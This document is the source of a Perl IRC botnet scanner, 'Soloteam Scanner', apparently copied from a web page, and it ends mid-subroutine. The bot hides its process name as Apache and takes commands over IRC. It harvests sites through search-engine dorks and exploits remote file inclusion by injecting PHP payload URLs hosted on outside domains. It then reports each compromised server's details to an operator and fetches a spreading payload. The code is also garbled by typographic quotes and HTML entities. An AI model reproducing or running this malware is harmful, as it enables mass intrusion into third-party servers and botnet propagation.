bot usil scaner

  1. !/usr/bin/perl

$process   = “/usr/local/apache2/bin/httpd -DSSL”;
my $printcmd  = “http://www.kuiwa.at/spider.txt?”;
my $id        = “http://www.kuiwa.at/tikam.txt?”;
my $spread    = “http://geocities.com/ina_lidya/spreads.txt?”;
my $bot       = “http://www.kuiwa.at/bot.txt?”;
my $bin       = “http://cause-i-can.com/readme.txt?”;
my $ircserver = “irc.byroe.net”;
my $start     = “!solo”;
my $port      = “6666”;
my $nickname  = “Solo” . int( rand(9) ). “”;
my $admin     = “Estrada”; ## put here ur nickname, so u can find all the results in pvt
my $channel   = “#soloteam”; ## the normal chan to scan, and see the results too😛
my $chanres   = “#bot”; ## the channel where u can find all the results of the bot
my $verz      = “Soloteam Scanner Technology”;

print “\n”;
print ”  Soloteam Scanner Technology\n”;
print ”  Author: noname\n”;
print ”  Release $verz\n”;
print ”  Server $ircserver:$port\n”;
print ”  $channel and $chanres\n”;
print ”  Enjoy ;)\n\n”;

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;

my $pid = fork;
exit if $pid;
$0 = “$process” . “” x 16;
my $dsp = IO::Socket::INET->new(
PeerAddr => “$ircserver”,
PeerPort => “$port”,
Proto    => “tcp”
) or die “Can not connect on server!\n”;
$dsp->autoflush(1);
print $dsp “NICK $nickname\r\n”;
print $dsp “USER usil 8 *  : Usil \r\n”;
print $dsp “JOIN $channel\r\n”;
print $dsp “PRIVMSG $channel :1Soloteam Scanner!! \r\n”;
print $dsp “PRIVMSG $channel :1Scan Command Is:4 !scan bug dork 1& 5!google bug dork \r\n”;
print $dsp “PRIVMSG $channel :7Soloteam Scanner powered By Team sOlTecH CoMmUniTy \r\n”;
sleep(1);
print $dsp “NICK $nickname\r\n”;
print $dsp “USER jahil 8 *  : Usil \r\n”;
print $dsp “JOIN $chanres\r\n”;
print $dsp “PRIVMSG $chanres :7Welcome 1:4) \r\n”;
print $dsp “PRIVMSG $chanres :7Soloteam Scanner Powered By Team sOlTecH CoMmUniTy \r\n”;

while ( $line = <$dsp> ) {

$line =~ s/\r\n$//;
if ( $line =~ /^PING \:(.*)/ ) {
print “PONG :$1”;
print $dsp “PONG :$1″;
}

if ( $line =~ /PRIVMSG $channel :!help/ ) {
sleep(1);
display( $dsp,”PRIVMSG $channel :10HELP:”);
display( $dsp,”PRIVMSG $channel :5[Help]10 Scan Command Is:4 !scan bug dork 10&4 !google bug dork”);
display( $dsp,”PRIVMSG $channel :5[Help]10 For Info Type: 7!info”);
}

if ( $line =~ /PRIVMSG $channel :!info/ ) {
my $sysos  = `uname -sr`;
my $uptime = `uptime`;
if ( $sysos =~ /freebsd/i ) {
$sysname = `hostname`;
$memory = `expr \`cat /var/run/dmesg.boot | grep “real memory” | cut -f5 -d” “\` \/ 1048576`;
$swap = `$toploc | grep -i swap | cut -f2 -d” ” | cut -f1 -d”M”`;
chomp($memory);
chomp($swap);
}

elsif ( $sysos =~ /linux/i ) {
$sysname = `hostname -f`;
$memory  = `free -m |grep -i mem | awk ‘{print \$2}’`;
$swap    = `free -m |grep -i swap | awk ‘{print \$2}’`;
chomp($swap);
chomp($memory);
}
else {
$sysname = “No Found”;
$memory  = “No found”;
$swap    = “No Found”;
}
$uptime  =~ s/\n//g;
$sysname =~ s/\n//g;
$sysos   =~ s/\n//g;
sleep(1);
display( $dsp,”PRIVMSG $channel :10Information:” );
display( $dsp,”PRIVMSG $channel :5-10 Server:14 $ircserver 10Port:14 $port” );
display( $dsp,”PRIVMSG $channel :5-10 Software:14 $sysos” );
display( $dsp,”PRIVMSG $channel :5-10 Process/Pid:14 $process” );
display( $dsp,”PRIVMSG $channel :5-10 Uptime:14 $uptime” );
display( $dsp,”PRIVMSG $channel :5-10 Memory:14 $memory 10Swap:14 $swap” );
display( $dsp,”PRIVMSG $channel :5-10 Creator:7 Team sOlTecH CoMmUniTy” );
display( $dsp,”PRIVMSG $channel :5-10 Version:7 $verz” );
}

if ( $line =~ /PRIVMSG $channel :!id/ )
{

  1. # Copyright © Script made by Team Soloteam indoIRC . Don’t remove this comment !

my $testid = $id;
my $req    = HTTP::Request->new( GET => $testid );
my $ua     = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /<\?php/ ) {
sleep(1);
display( $dsp,”PRIVMSG $channel :5[Info]3 The ID Is Work” );
}
}
else {
sleep(1);
display( $dsp,”PRIVMSG $channel :5[Info]4 ID Is Not Work.” );
display( $dsp,”PRIVMSG $channel :5[Info]4 Modify The ID.” );
display( $dsp,”PRIVMSG $channel :5[Info]4 The Scanner Will Be Quited.” );
display( $dsp,”PRIVMSG $channel :4[WARNING]12 Scanner Quited.” );
sleep(2);
display( $dsp,”PRIVMSG $channel :4[WARNING]12 Bye Bye” );
display( $dsp,”QUIT” );
}
}

if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
}
else {
if (fork) {
exit;
}
else {
my $bug       = $1;
my $dork      = $2;
my $contatore = 0;
my %hosts;
sleep(1);
display( $dsp,”PRIVMSG $channel :10Scan Started From Dork: 4$dork” );
my @google = &googlet($dork);
push( my @tot, @google );
my @puliti = &unici(@tot);
display( $dsp,
“PRIVMSG $channel :1GOOGLE15 ” . scalar(@tot). ” 10-15 ” . scalar(@puliti) . ” 10 From:14 $dork” );
my $uni = scalar(@puliti);

foreach my $site (@puliti) {
$contatore++;
if ( $contatore % 100 == 0 ) {
}
if ( $contatore == $uni – 1 ) {
display( $dsp,”PRIVMSG $channel :1Google10 Finished From Dork:14 $dork ” );
}
my $test  = “http://&#8221; . $site . $bug . $id . “?”;
my $test  = “http://&#8221; . $site . $bug . $bot . “?”;
my $test  = “http://&#8221; . $site . $bug . $id . “?”;
my $print = “http://&#8221; . $site . $bug . $printcmd . “?”;
my $req   = HTTP::Request->new( GET => $test );
my $ua    = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /netcat/ && $re =~ /uid=/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1” ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 1GOOGLE15 $bug14 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:4 OFF 10Os:7 $os 10Link:5 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:7 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:7 $free 10, Used:7 $used 10, Total:7 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:7 $up”
);
display( $dsp,”PRIVMSG $channel :10ID:7 $id1”
);
display( $dsp,”PRIVMSG $channel :10PWD:7 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:7 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:7 $sof1”
);
display( $dsp,”PRIVMSG $channel :10Ip Addr:7 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:7 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode:4 OFF 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode:4 OFF 1Os: $os Link: $print”
);
my $test2 = “http://&#8221; . $site . $bug . $bins . “?”;
my $test2 = “http://&#8221; . $site . $bug . $spread . “?”;
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
}
}
elsif ( $re =~ /netcat/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1” ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 1GOOGLE5 $bug4 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:3 ON 10Os:3 $os 10Link:3 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:3 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:3 $free 10Used:3 $used 10Total:3 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:3 $up”
);
display( $dsp,”PRIVMSG $channel :10PWD:3 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:3 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:3 $sof1”
);
display( $dsp,”PRIVMSG $channel :10IP Addr:3 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:3 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode: 3ON 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode: 3ON 1Os: $os Link: $print”
);
}
}
}
}
}
exit;
}
}

if ( $line =~ /PRIVMSG $channel :!google\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
}
else {
if (fork) {
exit;
}
else {
my $bug       = $1;
my $dork      = $2;
my $contatore = 0;
my %hosts;

my @google = &googlet($dork);
push( my @tot, @google );
my @puliti = &unici(@tot);
display( $dsp,”PRIVMSG $channel :1GOOGLE15 ” . scalar(@tot). ” 10-15 ” . scalar(@puliti) . ” 10 From:14 $dork” );
my $uni = scalar(@puliti);

foreach my $site (@puliti) {
$contatore++;
if ( $contatore % 100 == 0 ) {
}
if ( $contatore == $uni – 1 ) {
display( $dsp,”PRIVMSG $channel :1Google10 Finished From Dork:14 $dork ”
);
}
my $test  = “http://&#8221; . $site . $bug . $id . “?”;
my $test  = “http://&#8221; . $site . $bug . $bot . “?”;
my $test  = “http://&#8221; . $site . $bug . $id . “?”;
my $print = “http://&#8221; . $site . $bug . $printcmd . “?”;
my $req   = HTTP::Request->new( GET => $test );
my $ua    = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /netcat/ && $re =~ /uid=/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1” ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 1GOOGLE15 $bug14 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:4 OFF 10Os:7 $os 10Link:5 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:7 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:7 $free 10, Used:7 $used 10, Total:7 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:7 $up”
);
display( $dsp,”PRIVMSG $channel :10ID:7 $id1”
);
display( $dsp,”PRIVMSG $channel :10PWD:7 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:7 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:7 $sof1”
);
display( $dsp,”PRIVMSG $channel :10Ip Addr:7 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:7 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode:4 OFF 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode:4 OFF 1Os: $os Link: $print”
);
my $test2 = “http://&#8221; . $site . $bug . $bins . “?”;
my $test2 = “http://&#8221; . $site . $bug . $spread. “?”;
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
}
}
elsif ( $re =~ /netcat/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1” ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 1GOOGLE5 $bug4 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:3 ON 10Os:3 $os 10Link:3 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:3 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:3 $free 10Used:3 $used 10Total:3 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:3 $up”
);
display( $dsp,”PRIVMSG $channel :10PWD:3 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:3 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:3 $sof1”
);
display( $dsp,”PRIVMSG $channel :10IP Addr:3 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:3 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode: 3ON 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode: 3ON 1Os: $os Link: $print”
);
}
}
}
}
}
exit;
}
}

if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
}
else {
if (fork) {
exit;
}
else {
my $bug       = $1;
my $dork      = $2;
my $contatore = 0;
my %hosts;
my @alltheweb = &alltheweb($dork);
push( my @tot, @alltheweb );
my @puliti = &unici(@tot);
display( $dsp,
“PRIVMSG $channel :2ALLTHEWEB15 ” . scalar(@tot) . ” 10-15 ” . scalar(@puliti) . ” 10 From:14 $dork” );
my $uni = scalar(@puliti);

foreach my $site (@puliti) {
$contatore++;
if ( $contatore % 100 == 0 ) {
}
if ( $contatore == $uni – 1 ) {
display( $dsp,”PRIVMSG $channel :2ALLTHEWEB10 Finished From Dork:14 $dork ” );
}
my $test  = “http://&#8221; . $site . $bug . $id . “?”;
my $test  = “http://&#8221; . $site . $bug . $bot . “?”;
my $test  = “http://&#8221; . $site . $bug . $id . “?”;
my $print = “http://&#8221; . $site . $bug . $printcmd . “?”;
my $req   = HTTP::Request->new( GET => $test );
my $ua    = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /netcat/ && $re =~ /uid=/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1” ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 2ALLTHEWEB15 $bug14 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:4 OFF 10Os:7 $os 10Link:5 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:7 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:7 $free 10, Used:7 $used 10, Total:7 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:7 $up”
);
display( $dsp,”PRIVMSG $channel :10ID:7 $id1”
);
display( $dsp,”PRIVMSG $channel :10PWD:7 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:7 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:7 $sof1”
);
display( $dsp,”PRIVMSG $channel :10Ip Addr:7 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:7 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode:4 OFF 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode:4 OFF 1Os: $os Link: $print”
);
my $test2 = “http://&#8221; . $site . $bug . $bins . “?”;
my $test2 = “http://&#8221; . $site . $bug . $spread . “?”;
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
}
}
elsif ( $re =~ /netcat/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1” ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 2ALLTHEWEB5 $bug4 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:3 ON 10Os:3 $os 10Link:3 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:3 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:3 $free 10Used:3 $used 10Total:3 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:3 $up”
);
display( $dsp,”PRIVMSG $channel :10PWD:3 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:3 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:3 $sof1”
);
display( $dsp,”PRIVMSG $channel :10IP Addr:3 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:3 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode: 3ON 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode: 3ON 1Os: $os Link: $print”
);
}
}
}
}
}
exit;
}
}

if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
}
else {
if (fork) {
exit;
}
else {
my $bug       = $1;
my $dork      = $2;
my $contatore = 0;
my %hosts;
my @alt   = &altavista($dork);
push( my @tot, @alt );
my @puliti = &unici(@tot);
display( $dsp,
“PRIVMSG $channel :4ALTAVISTA15 ” . scalar(@tot) . ” 10-15 ” . scalar(@puliti) . ” 10 From:14 $dork” );
my $uni = scalar(@puliti);

foreach my $site (@puliti) {
$contatore++;
if ( $contatore % 100 == 0 ) {
}
if ( $contatore == $uni – 1 ) {
display( $dsp,”PRIVMSG $channel :4ALTAVISTA10 Finished From Dork:14 $dork ” );
}
my $test  = “http://&#8221; . $site . $bug . $id . “?”;
my $test  = “http://&#8221; . $site . $bug . $bot . “?”;
my $test  = “http://&#8221; . $site . $bug . $id . “?”;
my $print = “http://&#8221; . $site . $bug . $printcmd . “?”;
my $req   = HTTP::Request->new( GET => $test );
my $ua    = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /netcat/ && $re =~ /uid=/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1” ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 4ALTAVISTA15 $bug14 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:4 OFF 10Os:7 $os 10Link:5 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:7 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:7 $free 10, Used:7 $used 10, Total:7 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:7 $up”
);
display( $dsp,”PRIVMSG $channel :10ID:7 $id1”
);
display( $dsp,”PRIVMSG $channel :10PWD:7 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:7 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:7 $sof1”
);
display( $dsp,”PRIVMSG $channel :10Ip Addr:7 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:7 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode:4 OFF 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode:4 OFF 1Os: $os Link: $print”
);
my $test2 = “http://&#8221; . $site . $bug . $bins . “?”;
my $test2 = “http://&#8221; . $site . $bug . $spread. “?”;
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
}
}
elsif ( $re =~ /netcat/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1” ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 4ALTAVISTA5 $bug4 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:3 ON 10Os:3 $os 10Link:3 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:3 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:3 $free 10Used:3 $used 10Total:3 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:3 $up”
);
display( $dsp,”PRIVMSG $channel :10PWD:3 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:3 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:3 $sof1”
);
display( $dsp,”PRIVMSG $channel :10IP Addr:3 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:3 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode: 3ON 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode: 3ON 1Os: $os Link: $print”
);
}
}
}
}
}
exit;
}
}

if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
}
else {
if (fork) {
exit;
}
else {
my $bug       = $1;
my $dork      = $2;
my $contatore = 0;
my %hosts;
my @mlist = &msn($dork);
push( my @tot, @mlist );
my @puliti = &unici(@tot);
display( $dsp,
“PRIVMSG $channel :6MSN15 ” . scalar(@tot) . ” 10-15 ” . scalar(@puliti) . ” 10 From:14 $dork” );
my $uni = scalar(@puliti);

foreach my $site (@puliti) {
$contatore++;
if ( $contatore % 100 == 0 ) {
}
if ( $contatore == $uni – 1 ) {
display( $dsp,”PRIVMSG $channel :6MSN10 Finished From Dork:14 $dork ” );
}
my $test  = “http://&#8221; . $site . $bug . $id . “?”;
my $test  = “http://&#8221; . $site . $bug . $bot . “?”;
my $test  = “http://&#8221; . $site . $bug . $id . “?”;
my $print = “http://&#8221; . $site . $bug . $printcmd . “?”;
my $req   = HTTP::Request->new( GET => $test );
my $ua    = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /netcat/ && $re =~ /uid=/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1” ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 6MSN15 $bug14 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:4 OFF 10Os:7 $os 10Link:5 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:7 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:7 $free 10, Used:7 $used 10, Total:7 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:7 $up”
);
display( $dsp,”PRIVMSG $channel :10ID:7 $id1”
);
display( $dsp,”PRIVMSG $channel :10PWD:7 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:7 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:7 $sof1”
);
display( $dsp,”PRIVMSG $channel :10Ip Addr:7 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:7 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode:4 OFF 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode:4 OFF 1Os: $os Link: $print”
);
my $test2 = “http://&#8221; . $site . $bug . $bins . “?”;
my $test2 = “http://&#8221; . $site . $bug . $spread . “?”;
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
}
}
elsif ( $re =~ /netcat/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1” ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 6MSN5 $bug4 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:3 ON 10Os:3 $os 10Link:3 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:3 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:3 $free 10Used:3 $used 10Total:3 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:3 $up”
);
display( $dsp,”PRIVMSG $channel :10PWD:3 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:3 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:3 $sof1”
);
display( $dsp,”PRIVMSG $channel :10IP Addr:3 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:3 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode: 3ON 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode: 3ON 1Os: $os Link: $print”
);
}
}
}
}
}
exit;
}
}

}

sub display() {
if ( $#_ == ‘1’ ) {
my $dsp = $_[0];
print $dsp “$_[1]\n”;
}
else {
print $dsp “$_[0]\n”;
}
}

sub os() {
my $site = $_[0];
my $Res  = query($site);

while ( $Res =~ m/<br>uname -a:(.+?)\<br>/g ) {
$un = $1;
}
while ( $Res =~ m/<br>uptime:(.+?)\<br>/g ) {
$up = $1;
}
while ( $Res =~ m/<br>id:(.+?)\<br>/g ) {
$id1 = $1;
}
while ( $Res =~ m/<br>pwd:(.+?)\<br>/g ) {
$pwd1 = $1;
}
while ( $Res =~ m/<br>php:(.+?)\<br>/g ) {
$php1 = $1;
}
while ( $Res =~ m/<br>software:(.+?)\<br>/g ) {
$sof1 = $1;
}
while ( $Res =~ m/<br>server-ip:(.+?)\<br>/g ) {
$ip1 = $1;
}
while ( $Res =~ m/<br>server-name:(.+?)\<br>/g ) {
$name1 = $1;
}
while ( $Res =~ m/<br>os:(.+?)\<br>/g ) {
$os = $1;
}
while ( $Res =~ m/<br>free:(.+?)\<br>/g ) {
$free = $1;
}
while ( $Res =~ m/<br>used:(.+?)\<br>/g ) {
$used = $1;
}
while ( $Res =~ m/<br>total:(.+?)\<br>/g ) {
$all = $1;
}
}

sub googlet {
my @dominios = (
“ae”, “com.ar”, “at”, “com.au”, “be”, “com.br”,
“ca”, “ch”, “cl”, “de”, “dk”, “eu”, “sa”, “id”, “tr”, “pl”, “uk”, “gov”, “my”, “mx”
);
my @country =
( “AE”, “AR”, “AT”, “AU”, “BE”, “BR”, “CA”, “CH”, “CL”, “DE”, “DK” );
my @lst;
my $key = key( $_[0] );
my $c   = 0;
foreach my $i (@dominios) {
my @lista = google( $i, $key, $country[$c] );
push( @lst, @lista );
$c++;
}
return @lst;
}

sub google() {
my @lst;
my $i       = $_[0];
my $key     = $_[1];
my $country = $_[2];
for ( $b = 0 ; $b <= 100 ; $b += 100 ) {
my $Go =
(     “www.google.” . $i
. “/search?hl=en&q=”
. key($key)
. “&num=100&start=”
. $b
. “&meta=cr%3Dcountry”
. $country );
my $Res = query($Go);
while ( $Res =~ m/<a href=\”?http:\/\/([^>\”]*)\//g ) {
if ( $1 !~ /google/ ) {
my $k    = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}

sub alltheweb() {
my @lst;
my $key = $_[0];
my $i   = 0;
my $pg  = 0;
for ( $i = 0 ; $i <= 1000 ; $i += 100 ) {
my $all =
( “http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=&#8221;
. key($key) . “&o=”
. $i );
my $Res = query($all);
while ( $Res =~ m/<span class=\”?resURL\”?>http:\/\/(.+?)\<\/span>/g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
}
}
return @lst;
}

sub altavista() {
my @lst;
my $key = $_[0];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $AlT =
(“http://www.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=&#8221;.key($key).”&stq=”.$b);
my $Res = query($AlT);
while ( $Res =~ m/<span class=ngrn>(.+?)\//g ) {
if ( $1 !~ /altavista/ ) {
my $k = $1;
$k =~ s/<//g;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
}
}
if   ( $Res =~ /target=\”_self\”>Succ/ ) { }
else                                     { return @lst; }
}
return @lst;
}

sub searchs() {
my @lst;
my $key = $_[0];
for ( $b = 1 ; $b <= 100 ; $b++ ) {
my $sc =
( “http://www.search.com/search?q=&#8221; . key($key) . “&nav=” . $b );
my $Res = query($sc);
while ( $Res =~ m/<a href=\”?http:\/\/(.+?)/g ) {
my $k    = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
return @lst;
}

sub msn() {
my @lst;
my $key = $_[0];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $MsN =
(     “http://search.live.com/results.aspx?q=&#8221;
. key($key)
. “&first=”
. $b
. “&FORM=PERE” );
my $Res = query($MsN);
while ( $Res =~ m/<a href=\”?http:\/\/([^>\”]*)\//g ) {
if ( $1 !~ /msn|live/ ) {
my $k    = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}

sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= “/”;
$link .= “/”;
$hdir .= “/”;
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push( @l, $link, $host, $hdir );
return @l;
}

sub geths() {
my $host = $_[0];
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}

sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\”/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
return $dork;
}

sub end() {
$string = $_[0];
$string .= “/”;
$string =~ s/\/\//\//;
while ( $string =~ /\/\// ) {
$string =~ s/\/\//\//;
}
return ($string);
}

sub query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host  = $url;
my $query = $url;
my $page  = “”;
$host  =~ s/href=\”?http:\/\///;
$host  =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
if ( $query eq “” ) { $query = “/”; }
eval {
my $sock = IO::Socket::INET->new(
PeerAddr => “$host”,
PeerPort => “80”,
Proto    => “tcp”
) or return;
print $sock
